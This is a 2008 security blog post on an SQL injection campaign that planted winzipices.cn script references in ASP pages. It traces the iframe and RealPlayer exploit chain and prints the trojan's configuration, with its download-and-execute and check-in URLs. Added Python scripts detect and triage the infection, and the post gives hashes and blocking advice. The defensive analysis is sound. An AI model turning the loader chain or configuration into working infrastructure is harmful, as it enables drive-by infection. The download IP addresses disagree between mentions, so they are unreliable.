Wednesday, 7 May 2008
New SQL Injection Attacks and New Malware: winzipices.cn
Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.
As predicted, the SQL injection attacks against ASP and ASP.NET pages have continued. This time the domain "winzipices.cn" is in the spotlight: according to Google it has found its way into the source of over 4,000 pages. ISC also has a short diary entry today on this attack. It turns out this is something we have been looking at for a few days as well, so we would like to share some information that can help protect end users and organizations.
It would appear that the attackers in this instance are taking advantage of the same issues we discussed in our recent postings. However, the malware and the malicious file trail here differ from the last few attacks. If your website has been hacked, or you are visiting a hacked website, you will find something like this in the HTML source of the page you visit:
It appears that 1.js, 2.js, 3.js, and 4.js are also present. Each of these files in turn writes hidden iframes, which we discuss below.
The Malicious File Trail
Visiting a website injected with a reference to winzipices.cn followed by 1.js, 2.js, 3.js, 4.js, or 5.js results in the following set of requests:
hxxp://winzipices.cn/5.js writes a hidden iframe linking to hxxp://winzipices.cn/5.asp
hxxp://winzipices.cn/5.asp then writes two more hidden iframes:
hxxp://winzipices.cn/s.asp - appears to be an empty file
hxxp://winzipices.cn/pp.js - checks whether the browser's User-Agent identifies it as IE6 or IE7. If so, it attempts to send the browser to one of two pages via hidden iframes:
- IE6 users receive the following iframes:
  - hxxp://winzipices.cn/le.gif - contains a direct link to the malicious binary at hxxp://184.108.40.206/images/test.exe
  - hxxp://winzipices.cn/vv.js
  - hxxp://winzipices.cn/old.gif - older RealPlayer exploit against ierpplug.dll
  - hxxp://winzipices.cn/xin.gif - more recent RealPlayer exploit against CLSID 2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93
- hxxp://winzipices.cn/7.gif - IE7 users are sent here and receive only two of the iframes the IE6 users receive:
  - hxxp://winzipices.cn/old.gif - older RealPlayer exploit against ierpplug.dll
  - hxxp://winzipices.cn/xin.gif - more recent RealPlayer exploit against CLSID 2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93
A successful exploit results in a file called "test.exe" being downloaded from 220.127.116.11. This happens to be the same filename used in the recent attacks involving "nihaorr1.com"; however, the two are very different binaries.
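To check a page for this injection, here is an added example (not code from the original post) that scans saved HTML source for script and iframe elements whose src points at winzipices.cn and flags iframes that are hidden (zero size or display:none), the way the loader chain above writes them. The sample page is constructed for illustration; the domain set is the only thing taken from the post, and the function and class names are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Domain taken from the post; extend as new injection domains appear.
SUSPECT_HOSTS = {"winzipices.cn"}

# Constructed sample page (not captured from a real site): a normal catalog page
# with the injected <script> reference and the hidden iframe the loader writes.
SAMPLE_PAGE = """<html><head><title>Widget catalog</title>
<script src="/js/site.js"></script></head>
<body><h1>Widgets</h1>
<p>Blue widget, 4 USD</p><script src="http://winzipices.cn/5.js"></script>
<iframe src="http://winzipices.cn/5.asp" width="0" height="0"></iframe>
<iframe src="http://partner.example.com/ad" width="300" height="250"></iframe>
</body></html>"""


def _is_hidden(attrs):
    """True if an iframe is sized or styled so the user never sees it."""
    a = {name: (value or "") for name, value in attrs}
    style = a.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    zero = {"0", "0px"}
    return (a.get("width", "").strip().lower() in zero
            or a.get("height", "").strip().lower() in zero)


class InjectionScanner(HTMLParser):
    """Collects <script>/<iframe> tags whose src host is on the suspect list."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser hands tag and attribute names over already lower-cased.
        if tag not in ("script", "iframe"):
            return
        src = next((v for k, v in attrs if k == "src" and v), None)
        if not src:
            return
        host = (urlparse(src).hostname or "").lower()
        if host in SUSPECT_HOSTS:
            self.findings.append({
                "tag": tag,
                "src": src,
                "line": self.getpos()[0],
                "hidden": tag == "iframe" and _is_hidden(attrs),
            })


def scan_html(html):
    """Return a list of findings; an empty list means no reference to a suspect host."""
    scanner = InjectionScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE):
        flag = " (hidden)" if f["hidden"] else ""
        print(f"line {f['line']}: <{f['tag']}> -> {f['src']}{flag}")
```

Run it over pages saved by a crawler or by the web server's own templates; a hit on a page you own means the injected string is sitting in a database field that every page rendering that field will pick up.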
Another Interesting Discovery
We also noted that requesting non-existent files (404 responses) from this server returns a page containing two iframes:
hxxp://winzipices.cn/pp.htm - See above as we have already discussed this one
hxxp://winzipices.cn/test.htm - Not what you would expect. This page loads one of the following URLs at random:
- hxxp://www.bsu.edu/web/nmmakridakis/images/lolret1.jpg - with alt tag "sex girl"
- hxxp://www.bsu.edu/web/nmmakridakis/images/lolret8.jpg - with alt tag "my wow account"
- hxxp://www.bsu.edu/web/nmmakridakis/images/lolret7.jpg - with alt tag "WOW UI"
- hxxp://www.bsu.edu/web/nmmakridakis/images/lolret5.jpg - with alt tag "oh god"
- hxxp://www.bsu.edu/web/nmmakridakis/images/lolret6.jpg - with alt tag "UI"
- hxxp://www.bsu.edu/web/nmmakridakis/images/lolret2.jpg - with alt tag "UI"
- hxxp://www.bsu.edu/web/nmmakridakis/images/lolret3.jpg - with alt tag "UI"
These are all images of someone playing World of Warcraft. We are not sure how this fits into everything or why it is there, but it is quite peculiar.
In the most recent attacks we blogged about, the malware installed a password stealer that grabbed credentials from systems running Internet Explorer. This is definitely a different piece of malware, and the first executable does not appear to be a password stealer. The binary downloaded by this attack appears to be part of a kit we have seen in the Chinese malware family for some time now. The first thing it does once installed is download a configuration file. This configuration file contains several commands telling the system what to do next; in our instance it tells it to download yet another file and to report in to a URL.
The malware is downloaded from hxxp://18.104.22.168/images/test.exe; once installed, it makes the following requests back to winzipices.cn:
hxxp://winzipices.cn/config.txt - GET request for the configuration file
hxxp://winzipices.cn/1.exe - GET request for a binary to download and execute
hxxp://winzipices.cn/tong/post.asp?anyehorse=COMPUTER_NAME - GET request reporting in the system name
The configuration file for this malware looks like this:
Random: 3455*
Down: hxx://winzipices.cn/1.exe*
FlipWEB: *
SendGet: hxxp://winzipices.cn/tong/post.asp*
InfeWeb: *
NetBiosInfe: 1*
HDInfe: 0*
InfeExe: 0*
RemovInfe: 1*
RemovableDrive: 1*
FixedDrive: 1*
ReadTime: 1*
OpenSys: 1*
This is a malware family we have been seeing for some time now. Through the configuration file above it can be given several different capabilities, including ARP spoofing to inject malicious code into the web pages viewed by other users on the LAN.
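As an added example, not code from this post or from the malware itself, the following parser reads the asterisk-terminated config.txt format shown above into fields and pulls out what a responder acts on: the stage-2 download URL, the check-in URL, and which infection flags are set. The sample is the defanged copy from the post; treating hxx:// and hxxp:// as defanged http:// is an assumption, and since the page does not state what fields such as Random mean, they are returned raw. Function names are assumptions.

```python
# Defanged copy of the configuration file as shown above (the malware fetches it
# from winzipices.cn/config.txt); field names are the ones on the page.
CONFIG_SAMPLE = (
    "Random: 3455* Down: hxx://winzipices.cn/1.exe* FlipWEB: * "
    "SendGet: hxxp://winzipices.cn/tong/post.asp* InfeWeb: * NetBiosInfe: 1* "
    "HDInfe: 0* InfeExe: 0* RemovInfe: 1* RemovableDrive: 1* FixedDrive: 1* "
    "ReadTime: 1* OpenSys: 1*"
)

# Flag-style fields seen in the sample. Their exact semantics are not documented
# on the page, so they are only reported as set/unset.
FLAG_FIELDS = ("NetBiosInfe", "HDInfe", "InfeExe", "RemovInfe",
               "RemovableDrive", "FixedDrive", "ReadTime", "OpenSys")


def refang(url):
    """Assumption: hxxp:// and hxx:// are defanged http://, hxxps:// is https://."""
    u = url.strip()
    low = u.lower()
    if low.startswith("hxxps://"):
        return "https://" + u[len("hxxps://"):]
    for prefix in ("hxxp://", "hxx://"):
        if low.startswith(prefix):
            return "http://" + u[len(prefix):]
    return u


def parse_config(text):
    """Split the '*'-terminated records into a {field: value} dict.

    Each record is 'Key: value*'; an empty value (e.g. 'FlipWEB: *') is kept as ''.
    A record without a colon is treated as corrupt input rather than silently skipped,
    so a truncated or tampered download does not pass as a valid config.
    """
    fields = {}
    for record in text.split("*"):
        record = record.strip()
        if not record:
            continue  # the trailing '*' leaves an empty record
        key, sep, value = record.partition(":")
        if not sep:
            raise ValueError(f"malformed config record: {record!r}")
        fields[key.strip()] = value.strip()
    return fields


def extract_indicators(fields):
    """Pull the blockable and huntable pieces out of a parsed config."""
    return {
        "download_url": refang(fields["Down"]) if fields.get("Down") else None,
        "checkin_url": refang(fields["SendGet"]) if fields.get("SendGet") else None,
        "enabled_flags": [name for name in FLAG_FIELDS if fields.get(name) == "1"],
        "random": fields.get("Random"),  # meaning not stated on the page; kept raw
    }


if __name__ == "__main__":
    parsed = parse_config(CONFIG_SAMPLE)
    for key, value in extract_indicators(parsed).items():
        print(f"{key}: {value}")
```

The two URLs are what goes into the proxy blocklist; the enabled flags (removable and fixed drives, NetBIOS) tell an incident responder where else on the network to look once one infected host is found.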
The file 1.exe that the trojan then installs makes continuous outbound requests to 22.214.171.124 on port 1800.
File MD5: 8ca53bf2b7d8107d106da2da0f8ca700 (test.exe)
File Size: 28301 bytes
File MD5: 5c9322a95aaafbfabfaf225277867f5b (1.exe)
File Size: 38400 bytes
Protection & Detection
As always, we recommend blocking access to the malicious domains and sites. Using a content filter, changing DNS entries, and blocking IP addresses are all valid methods. Being up to date on patches (in this case for RealPlayer, which the exploit pages target) also goes a long way. Here's a quick recap of the malicious sites/IP addresses involved in this attack:
Note that blocking by IP address could also block legitimate pages on the same host (not likely in this case). It is also generally only useful for a short period, since attackers frequently change both IP addresses and domain names. For site owners, blocking does not help at all: the injected script reference lives in the site's own database fields, and removing it only lasts until the next injection unless the SQL injection hole that put it there is fixed as well.
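To turn the indicators above into a triage, here is an added example (not from the original post) that runs them over Squid-style proxy log lines and firewall lines, both constructed here. It separates hosts that merely loaded the injected script (exposed) from hosts that fetched config.txt or 1.exe, checked in via post.asp, or beaconed to port 1800 (infected), and pulls the victim computer name out of the anyehorse parameter. The C2 address is a TEST-NET placeholder to be replaced with the address from the post; the log formats, stage labels and function names are assumptions.

```python
import re
from urllib.parse import urlparse, parse_qs

MALICIOUS_HOSTS = {"winzipices.cn"}  # from the post

# Request paths from the post, labelled by their place in the chain.
STAGES = (
    (re.compile(r"^/\d\.js$"), "loader script"),
    (re.compile(r"^/(5|pp)\.(asp|js|htm)$"), "iframe chain"),
    (re.compile(r"^/(le|old|xin|7)\.gif$"), "exploit page"),
    (re.compile(r"^/config\.txt$"), "config download"),
    (re.compile(r"^/1\.exe$"), "stage-2 binary"),
    (re.compile(r"^/tong/post\.asp$"), "check-in"),
)
# Only a running implant produces these; everything else a browser reaches on its own.
INFECTED_STAGES = {"config download", "stage-2 binary", "check-in", "port 1800 beacon"}

C2_PORT = 1800
C2_ADDR = "203.0.113.10"  # placeholder (TEST-NET-3); substitute the address from the post

# Constructed log lines: Squid native access-log format, then a generic firewall line.
SAMPLE_LOGS = [
    "1210150000.123 45 10.1.2.3 TCP_MISS/200 512 GET http://www.example.com/products.asp - DIRECT/192.0.2.5 text/html",
    "1210150000.456 30 10.1.2.3 TCP_MISS/200 210 GET http://winzipices.cn/5.js - DIRECT/192.0.2.7 application/x-javascript",
    "1210150000.789 20 10.1.2.3 TCP_MISS/200 160 GET http://winzipices.cn/5.asp - DIRECT/192.0.2.7 text/html",
    "1210150060.001 25 10.1.2.9 TCP_MISS/200 300 GET http://winzipices.cn/config.txt - DIRECT/192.0.2.7 text/plain",
    "1210150061.002 25 10.1.2.9 TCP_MISS/200 200 GET http://winzipices.cn/tong/post.asp?anyehorse=WKSTN-42 - DIRECT/192.0.2.7 text/html",
    "May  7 05:34:01 fw kernel: ACCEPT src=10.1.2.9 dst=203.0.113.10 proto=tcp dport=1800",
]

# time elapsed client code/status bytes method url ...
SQUID_RE = re.compile(r"^(?P<ts>\S+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+(?P<method>\S+)\s+(?P<url>\S+)")
FW_RE = re.compile(r"src=(?P<src>\S+)\s+dst=(?P<dst>\S+)\s+proto=tcp\s+dport=(?P<dport>\d+)")


def classify_proxy_line(line):
    """Return a hit dict for a request to a malicious host, else None."""
    m = SQUID_RE.match(line)
    if not m:
        return None
    u = urlparse(m.group("url"))
    if (u.hostname or "").lower() not in MALICIOUS_HOSTS:
        return None
    stage = next((label for pat, label in STAGES if pat.match(u.path)),
                 "other request to malicious host")
    hit = {"client": m.group("client"), "stage": stage, "url": m.group("url")}
    if stage == "check-in":
        # the implant reports the victim's computer name in the anyehorse parameter
        hit["victim_name"] = parse_qs(u.query).get("anyehorse", [None])[0]
    return hit


def classify_fw_line(line):
    """Return a hit dict for an outbound connection to the port-1800 C2, else None."""
    m = FW_RE.search(line)
    if not m or m.group("dst") != C2_ADDR or int(m.group("dport")) != C2_PORT:
        return None
    return {"client": m.group("src"), "stage": "port 1800 beacon", "url": None}


def triage(lines):
    """Map each internal host to 'infected' or 'exposed' based on the deepest stage seen."""
    hits_by_host = {}
    for line in lines:
        hit = classify_proxy_line(line) or classify_fw_line(line)
        if hit:
            hits_by_host.setdefault(hit["client"], []).append(hit)
    return {
        host: ("infected" if any(h["stage"] in INFECTED_STAGES for h in hits) else "exposed")
        for host, hits in hits_by_host.items()
    }


if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_LOGS).items():
        print(f"{host}: {verdict}")
```

The distinction matters for response: an "exposed" host ran the loader script but, if it was not IE6/IE7 with a vulnerable RealPlayer, may be clean, while a "config download" or "check-in" can only come from the executing trojan and warrants reimaging.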
Posted May 07, 2008, at 05:34 AM by Steven Adair